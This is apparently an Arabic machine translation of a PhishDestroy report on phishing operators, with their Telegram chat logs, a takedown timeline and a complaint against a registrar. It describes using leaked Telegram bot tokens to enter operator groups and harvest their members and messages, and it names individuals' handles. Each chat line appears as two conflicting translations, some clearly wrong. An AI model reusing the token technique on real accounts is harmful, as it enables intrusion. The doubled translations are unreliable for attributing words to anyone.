طبيعي؟ لقد أوضحنا كل شيء هنا. أنت تقول إننا أغبياء.طبيعيون؟ لقد أوضحنا كل شيء هنا، وأنت تقول إننا أغبياء
B
بونيا2024-06-16 17:10
أنت تدافع عنهاأنتم تدافعون عنها
B
بونيا2024-06-16 17:10
ما زالت تحتفظ بأموالناأموالنا بقيت عندها
B
بونيا2024-06-16 17:10
جميعهمكل شيء
B
بونيا2024-06-16 17:10
قالت إنه تم دفع 60 ألفًا لرجل ما، لكنها نفت أن يكون لديها أي أموال.ماذا حدث عندما دفعوا له 60 ألفًا، فقال إنه لن يحصل على المال
B
بونيا2024-06-16 17:10
الموصوف*وصفوا*
B
بونيا2024-06-16 17:10
لقد تم شرح الموقف برمته لكملقد شرحوا لك الموقف بأكمله
B
بونيا2024-06-16 17:09
من الذي يتخلى عن الأمر؟ هي أم نحن؟من هو المخطئ، هي أم نحن؟
B
بونيا2024-06-16 17:09
لدينا 60 ألفًا في البنك. أين المال؟لقد أودعوا 60 ألفًا، أين المال؟
B
بونيا2024-06-16 17:09
لقد تم شرح الموقف لك بالكامل، بغض النظر عن جنسك.أي النساء اللواتي شرحن لك الموقف بأكمله، لا يهم الجنس على الإطلاق
B
بونيا2024-06-16 17:08
اسحب 60 ألفًا واكتفِ بذلك اليوم.تسجيل 60 ألفًا والانتهاء من الأمر
B
بونيا2024-06-16 17:08
أو سأضاجعك في حدود المعقول.أو ماذا بحق الجحيم لديكم في حدود المعقول؟
B
بونيا2024-06-16 17:08
الناس ليس لديهم ما يدفعونهمن أين يدفع الناس؟
B
بونيا2024-06-16 17:08
ويقول إن البطاقة تعرضت للتلف، وإنه لم يعد لديه مال.ويقول إن البطاقة معطلة، ولا يوجد مال
B
بونيا2024-06-16 17:08
تلقى رجل مبلغ 60 ألفًا، فذهبت لتطلق النار.أعطوها 60 ألفًا، فذهبت لتصوّر
B
بونيا2024-06-16 17:07
إذن، ستخبرني بالحقائق.إذن، اشرح لي ذلك بالتفصيل
B
بونيا2024-06-16 17:07
إذن، على من يقع اللوم بحق الجحيم؟ من هو المخطئ هنا، أنا؟حسناً، من المذنب بحق الجحيم؟ من هو المخطئ هنا، أنا؟
B
بونيا2024-06-16 17:07
أليس لديك ما تقوله؟ألا يوجد ما تقوله؟
B
بونيا2024-06-16 17:07
أو أنني لم أستطع كتابة الرمز السري اللعين.أو ماذا، اللعنة، لم أستطع حتى كتابة حرف «ب» بسبب يدي الملتوية
B
بونيا2024-06-16 17:06
كيف بحق الجحيم يمكن لآلة الصراف الآلي أن تعطل البطاقة؟كيف بحق الجحيم استطاعت ماكينة الصراف الآلي أن تبتلع البطاقة؟
B
بونيا2024-06-16 17:06
المغفلونالشفط
B
بونيا2024-06-16 17:06
وأنتَ تتحمس لها بشكل جنوني.ولماذا بحق الجحيم تقومون بتنزيل ملفاتها هنا؟
B
بونيا2024-06-16 17:06
أنتم أيها «الموهوبون بالفطرة» أيها الأغبياء اللعينون. لديكم امرأة لعينة جالسة هنا تتلاعب بأموالها، وقد ابتلعت آلة الصراف الآلي بطاقتها.تباً لكم أيها الحمقى، لديكم هراء يزعج الجدات، ويقولون إن بطاقتها قد علقت في جهاز الصراف الآلي
B
بونيا2024-06-16 16:40
@kysia1987 لا تعمل هذه الحيلة، لقد وجهت ركلة قوية واندمجت مع 60 ألف@kysia1987 لا تعمل، إنها عملية احتيال، أعطتني حصة صغيرة ثم اختفت مع 60 ألف
مونتي إسكوبار: الرئيس الصامت
وعلى النقيض تمامًا من رسائل بونيا البالغ عددها 261 رسالة، فإن مونتي لم يرسل سوى 10 رسائل عامة — كل ذلك في موضوع واحد على دردشة TraFFeeQ (المراجحة في حركة المرور السوداء عبر الإعلانات المباشرة/تحسين محركات البحث)، دفاعًا عن زميل:
دردشة TraFFeeQديسمبر 2025
"الرجل يؤدي عمله، ويحصل على أجره مقابل ذلك — هل تريد مناقشة الأمر؟"
الإنسان يؤدي عمله، ويحصل على أجر مقابل ذلك، فما الداعي للنقاش؟)
تطبيع العمل الإجرامي باعتباره «مجرد وظيفة»
دردشة TraFFeeQديسمبر 2025
"ليس هناك ما يمكن مناقشته معك"
لا جدوى من مناقشة الأمر معك
السلطة المتعالية — عقلية الرئيس، فوق النقاش
دردشة TraFFeeQديسمبر 2025
"هناك الكثير مما يمكن فعله غيرك!"
بدونك، هناك ما يشغلني)
يشير إلى وجود عدة عمليات متزامنة تتطلب اهتمامه
مجموعات «مونتي» على Telegram تكشف الباقي: ميدوسا جوجل إعلانات (الاحتيال في مجال الدفع مقابل النقر من قبل المخترقين)، أ قناة «ديبفايكس» (وسائل اصطناعية لأغراض الاحتيال)، و دردشة مارلبورو (خاص، غير معروف). اشتراك Telegram Premium، ساعات العمل على مدار الساعة طوال أيام الأسبوع، و«Есть предложение» ("لدي اقتراح") ترسم السيرة المهنية لشخص ما صورة لشخص يتعامل مع الجرائم الإلكترونية باعتبارها مشروعًا يكرس له وقته بالكامل.
مونتي إسكوبار: سجل الرسائل الكامل (10 رسائل)
-- TraFFeeQ Chat | التحكيم في مجال حركة المرور | الإعلانات السوداء/تحسين محركات البحث | (9 رسائل) --
ME
مونيتي إسكوبار2025-12-06 20:42
دعها وشأنها!اترك هذا!
ME
مونيتي إسكوبار2025-12-06 20:42
رجل يؤدي عملهالرجل منشغل بعمله
ME
مونيتي إسكوبار2025-12-06 20:42
لا عدوانلا عدوان بأي شكل من الأشكال
ME
مونيتي إسكوبار2025-12-06 20:40
لا تقلق بشأن ذلك أيضًالا تقلق بشأن هذا الأمر أيضًا
ME
مونيتي إسكوبار2025-12-06 20:39
تحدث معه يا أخي. ليس ممنوعًا عليه أن يفعل ذلك.تحدث معه يا أخي، فلم يُمنع من فعل ذلك
ME
مونيتي إسكوبار2025-12-06 20:39
هناك الكثير مما يمكن فعله غيرك!)هناك ما أفعله غيرك!)
ME
مونيتي إسكوبار2025-12-06 20:39
ليس هناك ما يمكن مناقشته معكلا جدوى من مناقشة الأمر معك
ME
مونيتي إسكوبار2025-12-06 20:38
إنه مكتوب بجانب لقبه. لا داعي للضغط عليه، ستقرأه.بجانب اسمه المستعار مكتوب: «لا داعي للتحدث إليه بصيغة المخاطب، اقرأ ما هو مكتوب»
ME
مونيتي إسكوبار2025-12-06 20:38
الرجل يؤدي عمله، ويحصل على أجر مقابل ذلك، (أود مناقشة هذا الأمر)الإنسان يؤدي عمله، ويحصل على أجر مقابل ذلك، فإذا أعجبك الأمر، فناقشه)
-- ميدوسا | Google Ads | الدردشة (1 رسالة) --
ME
مونيتي إسكوبار2025-09-23 18:07
😍😍

لقطة الشاشة 2 — ملف MONETTI الشخصي على Telegram.

لقطة الشاشة 3 — الملف الشخصي لـ «بونيا». لاحظ DC2 (أمستردام).
القسم 7: غرفة الطوارئ
بعد أن تمكن «PhishDestroy» من الوصول إلى مجموعة المشغلين عبر روبوت Telegram الذي تم الكشف عنه، جرت المحادثة التالية. تمت ترجمة سجل المحادثة الوارد أدناه إلى اللغة الإنجليزية مع الاحتفاظ بالنص الروسي الأصلي مكتوبًا بخط مائل. وقد تم حجب الهوية المستخدمة للدخول.
— تم حجب الاسم، وقد انضم عبر رمز بوت مكشوف —
R
تم حجب هذه المعلومات25-03-2026 13:03:43
/start
ME
مونيتي إسكوبار25-03-2026 13:06:53
?
ME
مونيتي إسكوبار25-03-2026 13:07:03
منمن
B
بونيا25-03-2026 13:07:14
XzХз
R
تم حجب هذه المعلومات25-03-2026 13:07:14
مرحبًا، ما عليك سوى الذهاب لحفظ بياناتك، انتظر دقيقة
ME
مونيتي إسكوبار25-03-2026 13:07:24
ما هذا بحق الجحيم؟ما هذا بحق الجحيم؟
B
بونيا25-03-2026 13:07:27
اللعنةتباً
B
بونيا25-03-2026 13:07:28
هذا هومن هذا؟
ME
مونيتي إسكوبار25-03-2026 13:07:42
أه-هه.أهاها
ME
مونيتي إسكوبار25-03-2026 13:07:44
ما هذا بحق الجحيم؟ما هذا بحق الجحيم
B
بونيا25-03-2026 13:07:53
تعرضت حساب الروبوت للاختراقتم اختراق البوت
B
بونيا25-03-2026 13:08:16
قيل لي إن دفاعنا في حالة مزرية.بالمناسبة، قيل لي إن دفاعنا قوي للغاية
B
بونيا25-03-2026 13:08:22
حسنًا، هناك نوعٌ ماحسناً، هناك شخص ما
B
بونيا25-03-2026 13:08:43
الأمر أشبه باختراق روبوت عبر عملية تصيد.إن كسر البوت عبر «فيش» أمر سهل للغاية، كضرب إصبع بإصبع
ME
مونيتي إسكوبار25-03-2026 13:09:09
@devosus
ME
مونيتي إسكوبار25-03-2026 13:09:21
[تم حجبها].[تم حجبها]
ME
مونيتي إسكوبار25-03-2026 13:09:24
من هذا؟من هذا؟
B
بونيا25-03-2026 13:10:29
تحقق من ملفك الشخصي.تحقق من ملفك الشخصي
B
بونيا25-03-2026 13:10:32
إنه مخترقهذا مخترق
B
بونيا25-03-2026 13:10:35
حرفياً.بالمعنى الحرفي
B
بونيا25-03-2026 13:10:41
ترجم ما كان يتلقاه من رسائل روحيةقالوا إنه يكتب في القناة
B
بونيا25-03-2026 13:10:55
[تم حجب النص — يقوم بونيا بنسخ الرسالة ولصقها من القناة التي أبلغت عن نطاقهم، في محاولة لتحديد هوية الشخص الذي أبلغ عنهم]
B
بونيا25-03-2026 13:12:19
حسناً، آه.حسناً، لا بأس
B
بونيا25-03-2026 13:12:23
لا أعرف بحق الجحيم من هذا.لا أعرف من يكون هذا بحق الجحيم
B
بونيا25-03-2026 13:12:25
لكن ليس إلى الأبدلكن ليس للأفضل
B
بونيا25-03-2026 13:12:47
@devosus فكر في الدفاع قبل أن نتعرض لهزيمة ساحقة.@devosus فكر في مسألة الدفاع قبل أن يمزقوا مؤخرتنا
ملاحظة المحرر: بونيا يشعر بأن الأمر قادم. لنفترض أنه روسي ويعتبر الاحتيال على أوكرانيا «عملاً وطنياً». فماذا عن إندونيسيا —
شريك في مجموعة بريكس منذ أكتوبر 2024 (قمة قازان)؟ هل يُعتبر السرقة من مواطني حلفائك عملاً وطنياً أيضاً؟ المحتالون من دول رابطة الدول المستقلة هم لصوص لا يميزون بين أحد، يفتقرون تماماً إلى الذكاء والولاء. اقرأ تحقيقاتنا الأخرى التي وثقنا فيها
قضايا المقاضاة بالنسبة للمشغلات المماثلة — تكون النهاية دائمًا واحدة.
ME
مونيتي إسكوبار25-03-2026 13:12:49
نعم، أرى ذلك.نعم، أرى ذلك
ME
مونيتي إسكوبار25-03-2026 13:12:55
تباً لك.ما هذا الهراء الذي تقوله؟
B
بونيا25-03-2026 13:13:09
حسنًا، أن تشعر بالإرهاق ليس بالأمر المثير أيضًا.حسناً، أن نكون ملتصقين ببعضنا البعض ليس أمراً ممتعاً للغاية
ME
مونيتي إسكوبار25-03-2026 13:13:13
لن يفعل شيئًالن يفعل شيئًا
ME
مونيتي إسكوبار25-03-2026 13:13:18
ماذا سيفعل؟ماذا سيكشف؟
D
ديفويس25-03-2026 13:13:26
ما هوما هذا؟
ME
مونيتي إسكوبار25-03-2026 13:13:34
نعم، انضم رجلنعم، لقد انضم
D
ديفويس25-03-2026 13:13:34
من أينمن أين
B
بونيا25-03-2026 13:13:35
حتى لو قمت بتسجيل الدخول إلى موقع التصيد عدة مرات باستخدام عنوان IP الخاص بك، فإن هذا الأمر لم يعد مقبولاً.حتى لو دخلت إلى موقع «فيش» مرتين من عنوان IP الخاص بي، فقد فقد الأمر متعته
ME
مونيتي إسكوبار25-03-2026 13:13:37
إلى المجموعةإلى المجموعة
ME
مونيتي إسكوبار25-03-2026 13:13:38
XzХз
D
ديفويس25-03-2026 13:13:39
عند استخدام interpolعندما يكون الأمر متعلقاً بالإنتربول
D
ديفويس25-03-2026 13:13:41
التيإلى أيّ
ME
مونيتي إسكوبار25-03-2026 13:13:44
هذاهذه
B
بونيا25-03-2026 13:13:46
لقد جئت إلى هنا فقط للدردشةلقد دخلت إلى الدردشة هنا
B
بونيا25-03-2026 13:13:49
وقد كتب أنهكتب قائلاً:
ME
مونيتي إسكوبار25-03-2026 13:13:56
.
B
بونيا25-03-2026 13:13:57
مرحبًا، ما عليك سوى الذهاب لحفظ بياناتك، انتظر دقيقة
ME
مونيتي إسكوبار25-03-2026 13:14:11
[صورة تمت مشاركتها]
D
ديفويس25-03-2026 13:14:31
لقد رأيتهم من قبل.لقد رأيت أمثال هؤلاء من قبل
B
بونيا25-03-2026 13:14:44
حسنًا، لقد تم الكشف عن استخدامنا لـ«ukr bot» أيضًا.حسناً، لقد تعرضنا للتعطيل عبر البوت الأوكراني
B
بونيا25-03-2026 13:14:55
لم ترسل أي رسالة نصية في غرفة الدردشة.لم يكتبوا ذلك في الدردشة
B
بونيا25-03-2026 13:14:57
ألم تكتبأم لا، هل كتبوا؟
ME
مونيتي إسكوبار25-03-2026 13:15:04
لا أكترث أبدًا.نعم، ولا يهمني
B
بونيا25-03-2026 13:15:06
نيابة عن القناةنيابة عن القناة
D
ديفويس25-03-2026 13:15:23
انسَ الأمر تمامًا.لا تهتم، تباً
ME
مونيتي إسكوبار25-03-2026 13:15:31
سأقوم بتفكيك هذه المجموعةسأقوم بإزالة هذه المجموعة
B
بونيا25-03-2026 13:15:35
+
D
ديفويس25-03-2026 13:15:35
نعمنعم
— تم حذف المجموعة من قِبل المالك —
تم حذف المجموعة في غضون دقائق. ويكشف إقرار بونيا عند المغادرة — «+» — وتأكيد ديفويس بعبارة «نعم» عن القصة بأكملها: كانوا يعلمون أن أمرهم قد انكشف، ولم يكن أمامهم سوى تدمير الأدلة. ولكن بحلول ذلك الوقت، كانت البيانات قد تم تسجيلها بالفعل.
لاحظوا تعليق بونيا الذي يكشف الكثير: "تعرضنا أيضًا لهجوم على البوت الأوكراني" — مما يؤكد أن كلا المشروعين (الأوكراني والإندونيسي) يشتركان في نفس فريق التشغيل، وأن هذه ليست المرة الأولى التي تتعرض فيها بنيتهما التحتية للاختراق.
القسم 8: ما الذي يوضحه هذا؟
كيف يعمل PhishDestroy
كل نطاق يظهر على phishdestroy.io يمر عبر هذا Pipeline الآلي. ولم يكن موقع dopomogvoina[.]sbs استثناءً من ذلك.
الكشف
التحليل الثابت
رسم خرائط البنية التحتية
اكتشاف الأصل
OSINT
إنشاء التقارير
الجدول الزمني للتحقيق
20 مارس 2026
المجال dopomogvoina[.]sbs مسجلة عبر شركة NiceNIC International
21 مارس 2026
تم اكتشافه بواسطة Pipeline الآلي لـ PhishDestroy
21 مارس 2026
اكتمل التحليل الآلي بالكامل: تم تحديد البنية التحتية، وإزالة التعتيم عن حزمة JS، وتوثيق بروتوكول WebSocket
22 مارس 2026
تم تحديد عنوان IP المصدر. اكتشاف مشروع تصيد ثانٍ ("HealthCare ID") على نفس الخادم
22 مارس 2026
مكشوف config.json يؤدي إلى تحديد هوية المشغل عبر API Telegram Bot
23 مارس 2026
تم تقديم بلاغات عن حالات إساءة الاستخدام إلى مزود خدمة الاستضافة، و«Cloudflare»، ومراكز الاستجابة لحوادث الأمن الحاسوبي (CERT) ذات الصلة
25 مارس 2026
تم نشر المقال. تقارير النطاق متاحة الآن على موقع PhishDestroy
كيف كان ذلك ممكنًا: شبكة الذكاء الاصطناعي للروبوتات الخاصة بـ PhishDestroy
وقد أُجري هذا التحقيق بالكامل من قبل الأنظمة الآلية. لا يقتصر دور Pipeline لـ PhishDestroy على اكتشاف نطاقات التصيد فحسب — بل إنه يتسلل إلى البنية التحتية للمشغلين الذين يقفون وراءها.
2,000+
جمع بيانات روبوتات Telegram
نشط
لا تزال بعض الروبوتات خاضعة للمراقبة
منذ عام 2024
تشغيل عملية التجميع
عندما تكشف مجموعات أدوات التصيد الاحتيالي عن رموز بوتات Telegram — كما حدث في هذه الحالة من خلال config.json — يقوم نظامنا تلقائيًّا بجمعها، وتصنيف مجموعات المشغلين، واستخراج قوائم الأعضاء، وأرشفة سجلات الرسائل. أكثر من 2,000 روبوت تم جمعها بهذه الطريقة منذ عام 2024. ولا يزال بعضها نشطًا، ونحن نستمتع بمشاهدة المجرمين وهم ينفذون جرائمهم في الوقت الفعلي — لأن النهاية مكتوبة سلفًا.
حتى المشغلون الذين يحذفون حساباتهم أو يمسحون مجموعاتهم يكونون قد فات الأوان. فبحلول الوقت الذي ينتابهم فيه الذعر، نكون قد حصلنا بالفعل على كل شيء — أرشيفات الرسائل، وبيانات الملفات الشخصية، وعضويات المجموعات، والروبوتات المرتبطة. الحذف لا يغير شيئًا. كانت البيانات موجودة، وهي موجودة الآن في قاعدة بياناتنا.
"انتظرني" — نسخة المحتالين
هذه الحالة ليست فريدة من نوعها — إنها مثال على الإهمال المتعمد من جانب NiceNIC الذي قررنا تقديمه كمثال على «المخترقين الكبار». وكما أشار «Типичный Мошенник» بشكل صحيح: هناك فرق بين المخترقين والمحتالين — الاستخبارات. هؤلاء الأشخاص ليسوا قراصنة ولا أذكياء.
تقوم أنظمة PhishDestroy تلقائيًّا بجمع أدلة من هذا القبيل عبر آلاف النطاقات — من خلال رصد الروبوتات، وأرشفة اتصالات المشغلين، ورسم خرائط البنية التحتية. وكانت هذه الحالة بالذات سخيفة للغاية لدرجة أنه كان من المستحيل عدم نشرها. فمجموعة أدوات التصيد الاحتيالي المستخدمة هي من النوع المتوفر في السوق، ولا توجد أي إجراءات أمنية تشغيلية (OPSEC)، كما أن المشغلين قاموا بحذف مجموعتهم في حالة من الذعر في غضون دقائق من اكتشافها.
نحن نعمل على تطوير نظام سيقوم بعرض هويات المشغلين التي تم التحقق منها مباشرةً على صفحات تقارير النطاقات — من محتال إلى ضحية، تمامًا مثل البرنامج التلفزيوني الروسي «Жди Меня» (انتظرني)، لكن في الاتجاه المعاكس. ويُعرض البرنامج في وضع مغلق منذ عام 2024. وقد تم بالفعل تحديد هوية العديد من المشغلين — بمن فيهم أولئك الذين حذفوا حساباتهم. ونحن الآن بصدد تحديد الأكثر مثير للاهتمام طريقة عرض الموضوع. تابعونا.
المجالات ذات الصلة
وقد حدد تحليلنا مجالًا ثانيًا — hlpforvpeople[.]sbs — مسجلان لدى نفس الجهة المسجلة مع أنماط بنية تحتية متطابقة. وكلا النطاقين موثقان في قاعدة بياناتنا:
عدم امتثال المسجل: NiceNIC International
حصلت شركة «NiceNIC International Group Co., Limited» (هونغ كونغ) على تقارير متعددة ومفصلة عن حالات الإساءة من PhishDestroy بخصوص كلا الأمرين dopomogvoina[.]sbs و hlpforvpeople[.]sbs. في وقت النشر — بعد 5 أيام من التقرير الأول — لم يتم اتخاذ أي إجراء. ولا يزال كلا النطاقين يعملان بشكل كامل.
هذه ليست حالة منفردة. فـ«NiceNIC» مشكلة متكررة في تحقيقاتنا. عنوان البريد الإلكتروني الخاص بشؤون إساءة الاستخدام لدى الجهة المسجلة (abuse@nicenic.net) تتجاهل باستمرار الرد على تقارير التصيد الاحتيالي المليئة بالأدلة. وعلى الرغم من كونها جهة تسجيل معتمدة من ICANN وتخضع لأحكام اتفاقية اعتماد جهات التسجيل (RAA، المادة 3.18)، فإن NiceNIC تعمل في ظل إفلات واضح من العقاب.
تحافظ شركة NiceNIC على وجودها باللغة الروسية، وتبيع .ru تبيع النطاقات بأسعار مرتفعة (حوالي 200 دولار)، وتتواصل مع العملاء عبر «VK» و«Telegram» — وهما منصتان شائعتان بين الجمهور الناطق بالروسية. ويُثير تداخل قاعدة عملائها مع المجتمعات السرية تساؤلات جدية حول ما إذا كان عدم استجابة شركة التسجيل لتقارير إساءة الاستخدام يمثل إهمالًا أم استراتيجية تجارية متعمدة.
نُشر جزء من هذا التحقيق بسبب تقاعس NiceNIC المستمر. وعندما ترفض جهات التسجيل اتخاذ إجراءات بشأن إساءة استخدام تقنيات التصيد الاحتيالي، يصبح الكشف العلني الآلية الوحيدة المتبقية للمساءلة.
النقاط الرئيسية
- الأتمتة هي السبيل الوحيد لمواكبة التطورات. يتم نشر مجموعات أدوات التصيد الاحتيالي وتسليحها في غضون ساعات. ولا يمكن للمراجعة اليدوية مواكبة هذا التوسع.
- المشغلون يرتكبون أخطاء. أدى ملف إعدادات مكشوف في مشروع ثانوي إلى الكشف عن عملية تصيد احتيالي متعددة الجنسيات بأكملها. من الصعب الحفاظ على أمن العمليات (OPSEC) المثالي في جميع المشاريع.
- تتطور الهندسة الاجتماعية مع تغير الأحداث الإخبارية. يتم استغلال الحرب والمساعدات الإنسانية والبرامج الحكومية بشكل متزايد كطُعم لعمليات التصيد الاحتيالي، لأنها تستهدف الأشخاص الذين يمرون بظروف صعبة والذين تقل احتمالية تشكيكهم في شرعية هذه العمليات.
- إعادة استخدام البنية التحتية هي القاعدة. خادم واحد، مشروعان للتصيد الاحتيالي، بلدان، نفس المشغلين. إن تتبع روابط البنية التحتية يكشف عن معلومات أكثر بكثير مما يكشفه تحليل نطاق واحد بمعزل عن غيره.
الأبحاث ذات الصلة
المزيد من التحقيقات من Pipeline الاستخبارات الآلي التابع لـ PhishDestroy
إخلاء المسؤولية: أُجري هذا التحقيق بالكامل من خلال الاستطلاع السلبي وواجهات برمجة التطبيقات (API) العامة. ولم يتم إجراء أي وصول غير مصرح به إلى أي نظام. استخدمت استدعاءات واجهة برمجة تطبيقات (API) روبوت Telegram رمزًا مميزًا (token) كشف عنه المشغلون علنًا في نقطة نهاية غير خاضعة للمصادقة. وقد تم إخفاء جميع أسماء النطاقات الواردة في هذا المقال وفقًا للأعراف القياسية في مجال أمن المعلومات.